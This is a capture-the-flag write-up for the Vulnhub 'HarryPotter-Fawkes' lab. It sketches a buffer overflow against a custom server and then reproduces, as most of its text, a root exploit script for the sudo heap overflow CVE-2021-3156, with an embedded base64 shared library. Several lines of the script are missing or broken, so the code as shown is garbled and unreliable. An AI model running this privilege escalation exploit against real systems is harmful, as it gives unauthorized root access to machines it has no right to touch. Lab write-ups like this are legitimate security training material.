Vulnhub HarryPotter-Fawkes

Virtual Box address:

Difficulty: High
Target: 2 root privilege, 3 Flags

Host Discovery

We found that port 21 opens, check it out. We can use anonymous method to o login the service to get the intensive information. But port 2222 and port Nmap98, nmap can’t figure them out. So I will check them later.

We can log in with anonymous

get the file first

Using netcat to connect the portreceive recvice data

We try to input the spell.

server_hogwarts is a executable file, maybe we can find some exploit in it. For example buffer overflow..

After we runing the executable file, the port 9898 will open automacally in my Kali. That’s wried, but we can use Netcat to connect the localhost, to check what the happening here.

The situation is the same as the remote machine. So if we exploit the server_hogwarts, we can exploit the remote machine.

Oh maybe it works!

Now we can use the gdb with peda(The tool uses in Reverse Engnering filed), to find to EIP address and how long the prefix is.

Ok we get the offset

So we should find the ESP address to make the CPU to execute malicious payload where we have wirte the them in ESP before.

OK, we know the offset and “jmp esp” command address, now we can create the mailcious payload.

Get shell

We found the vulnerability in sudo, the sudo version is exploitable

Exploit for CVE-2021-3156 with overwrite struct service_user by sleepya
This exploit requires:
- glibc with tcache
- nscd service is not running
Tested on:
- Ubuntu 18.04
- Ubuntu 20.04
- Debian 10
- CentOS 8
import os
import subprocess
import sys
from ctypes import cdll, c_char_p, POINTER, c_int, c_void_p

SUDO_PATH = b"/usr/local/bin/sudo"

libc = cdll.LoadLibrary("")

# don't use LC_ALL (6). it override other LC_

def check_is_vuln():
	# below commands has no log because it is invalid argument for both patched and unpatched version
	# patched version, error because of '-s' argument
	# unpatched version, error because of '-A' argument but no SUDO_ASKPASS environment
	r, w = os.pipe()
	pid = os.fork()
	if not pid:
		# child
		os.dup2(w, 2)
		execve(SUDO_PATH, [ b"sudoedit", b"-s", b"-A", b"/aa", None ], [ None ])
	# parent
	os.waitpid(pid, 0)
	r = os.fdopen(r, 'r')
	err =

	if "sudoedit: no askpass program specified, try setting SUDO_ASKPASS" in err:
		return True
	assert err.startswith('usage: ') or "invalid mode flags " in err, err
	return False

def create_libx(name):
	so_path = 'libnss_'+name+'.so.2'
	if os.path.isfile(so_path):
		return  # existed

	so_dir = 'libnss_' + name.split('/')[0]
	if not os.path.exists(so_dir):

	import zlib
	import base64

	libx_b64 = 'eNqrd/VxY2JkZIABZgY7BhBPACrkwIAJHBgsGJigbJAydgbcwJARlWYQgFBMUH0boMLodAIazQGl\neWDGQM1jRbOPDY3PhcbnZsAPsjIjDP/zs2ZlRfCzGn7z2KGflJmnX5zBEBASn2UdMZOfFQDLghD3'
	with open(so_path, 'wb') as f:
	#os.chmod(so_path, 0o755)

def check_nscd_condition():
	if not os.path.exists('/var/run/nscd/socket'):
		return True # no socket. no service

	# try connect
	import socket
	sk = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
		return True

	with open('/etc/nscd.conf', 'r') as f:
		for line in f:
			line = line.strip()
			if not line.startswith('enable-cache'):
				continue # comment
			service, enable = line.split()[1:]
			# in fact, if only passwd is enabled, exploit with this method is still possible (need test)
			# I think no one enable passwd but disable group
			if service == 'passwd' and enable == 'yes':
				return False
			# group MUST be disabled to exploit sudo with nss_load_library() trick
			if service == 'group' and enable == 'yes':
				return False

	return True

def get_libc_version():
	output = subprocess.check_output(['ldd', '--version'], universal_newlines=True)
	for line in output.split('\n'):
		if line.startswith('ldd '):
			ver_txt = line.rsplit(' ', 1)[1]
			return list(map(int, ver_txt.split('.')))
	return None

def check_libc_version():
	version = get_libc_version()
	assert version, "Cannot detect libc version"
	# this exploit only works which glibc tcache (added in 2.26)
	return version[0] >= 2 and version[1] >= 26

def check_libc_tcache():
	libc.malloc.argtypes = (c_int,)
	libc.malloc.restype = c_void_p = (c_void_p,)
	# small bin or tcache
	size1, size2 = 0xd0, 0xc0
	mems = [0]*32
	# consume all size2 chunks
	for i in range(len(mems)):
		mems[i] = libc.malloc(size2)

	mem1 = libc.malloc(size1)
	mem2 = libc.malloc(size2)
	for addr in mems:
	return mem1 != mem2

def get_service_user_idx():
	'''Parse /etc/nsswitch.conf to find a group entry index
	idx = 0
	found = False
	with open('/etc/nsswitch.conf', 'r') as f:
		for line in f:
			if line.startswith('#'):
				continue # comment
			line = line.strip()
			if not line:
				continue # empty line
			words = line.split()
			if words[0] == 'group:':
				found = True
			for word in words[1:]:
				if word[0] != '[':
					idx += 1

	assert found, '"group" database is not found. might be exploitable but no test'
	return idx

def get_extra_chunk_count(target_chunk_size):
	# service_user are allocated by calling getpwuid()
	# so we don't care allocation of chunk size 0x40 after getpwuid()
	# there are many string that size can be varied
	# here is the most common
	chunk_cnt = 0

	# get_user_info() -> get_user_groups() ->
	gids = os.getgroups()
	malloc_size = len("groups=") + len(gids) * 11
	chunk_size = (malloc_size + 8 + 15) & 0xfffffff0  # minimum size is 0x20. don't care here
	if chunk_size == target_chunk_size: chunk_cnt += 1

	# host=<hostname>  (unlikely)
	# get_user_info() -> sudo_gethostname()
	import socket
	malloc_size = len("host=") + len(socket.gethostname()) + 1
	chunk_size = (malloc_size + 8 + 15) & 0xfffffff0
	if chunk_size == target_chunk_size: chunk_cnt += 1

	# simply parse "networks=" from "ip addr" command output
	# another workaround is bruteforcing with number of 0x70
	# policy_open() -> format_plugin_settings() ->
	# a value is created from "parse_args() -> get_net_ifs()" with very large buffer
		import ipaddress
		return chunk_cnt
	cnt = 0
	malloc_size = 0
	proc = subprocess.Popen(['ip', 'addr'], stdout=subprocess.PIPE, bufsize=1, universal_newlines=True)
	for line in proc.stdout:
		line = line.strip()
		if not line.startswith('inet'):
		if cnt < 2: # skip first 2 address (lo interface)
			cnt += 1
		addr = line.split(' ', 2)[1]
		mask = str(ipaddress.ip_network(addr if sys.version_info >= (3,0,0) else addr.decode("UTF-8"), False).netmask)
		malloc_size += addr.index('/') + 1 + len(mask)
		cnt += 1
	malloc_size += len("network_addrs=") + cnt - 3 + 1
	chunk_size = (malloc_size + 8 + 15) & 0xfffffff0
	if chunk_size == target_chunk_size: chunk_cnt += 1

	return chunk_cnt

def execve(filename, argv, envp):
	libc.execve.argtypes = c_char_p,POINTER(c_char_p),POINTER(c_char_p)

	cargv = (c_char_p * len(argv))(*argv)
	cenvp = (c_char_p * len(envp))(*envp)

	libc.execve(filename, cargv, cenvp)

def lc_env(cat_id, chunk_len):
	name = b"C.UTF-8@"
	name = name.ljust(chunk_len - 0x18, b'Z')
	return LC_CATS[cat_id]+b"="+name

assert check_is_vuln(), "target is patched"
assert check_libc_version(), "glibc is too old. The exploit is relied on glibc tcache feature. Need version >= 2.26"
assert check_libc_tcache(), "glibc tcache is not found"
assert check_nscd_condition(), "nscd service is running, exploit is impossible with this method"
service_user_idx = get_service_user_idx()
assert service_user_idx < 9, '"group" db in nsswitch.conf is too far, idx: %d' % service_user_idx

# Note: actions[5] can be any value. library and known MUST be NULL
FAKE_USER_SERVICE_PART = [ b"\\" ] * 0x18 + [ b"X/X1234\\" ]

FAKE_USER_SERVICE[-1] = FAKE_USER_SERVICE[-1][:-1]  # remove last '\\'. stop overwritten


# Allow custom extra_chunk_cnt incase unexpected allocation
# Note: this step should be no need when CHUNK_CMND_SIZE is 0xf0
extra_chunk_cnt = get_extra_chunk_count(CHUNK_CMND_SIZE) if len(sys.argv) < 2 else int(sys.argv[1])

argv = [ b"sudoedit", b"-A", b"-s", b"A"*(CHUNK_CMND_SIZE-0x10)+b"\\", None ]
env = [ b"Z"*(TARGET_OFFSET_START + 0xf - 8 - 1) + b"\\" ] + FAKE_USER_SERVICE
# first 2 chunks are fixed. chunk40 (target service_user) is overwritten from overflown cmnd (in get_cmnd)
env.extend([ lc_env(0, 0x40)+b";A=", lc_env(1, CHUNK_CMND_SIZE) ])

# add free chunks that created before target service_user
for i in range(2, service_user_idx+2):
	# skip LC_ALL (6)
	env.append(lc_env(i if i < 6 else i+1, 0x40))
if service_user_idx == 0:
	env.append(lc_env(2, 0x20)) # for filling hole

for i in range(11, 11-extra_chunk_cnt, -1):
	env.append(lc_env(i, CHUNK_CMND_SIZE))

env.append(lc_env(12, 0x90)) # for filling holes from freed file buffer
env.append(b"TZ=:")  # shortcut tzset function
# don't put "SUDO_ASKPASS" environment. sudo will fail without logging if no segfault

execve(SUDO_PATH, argv, env)

Final get shell!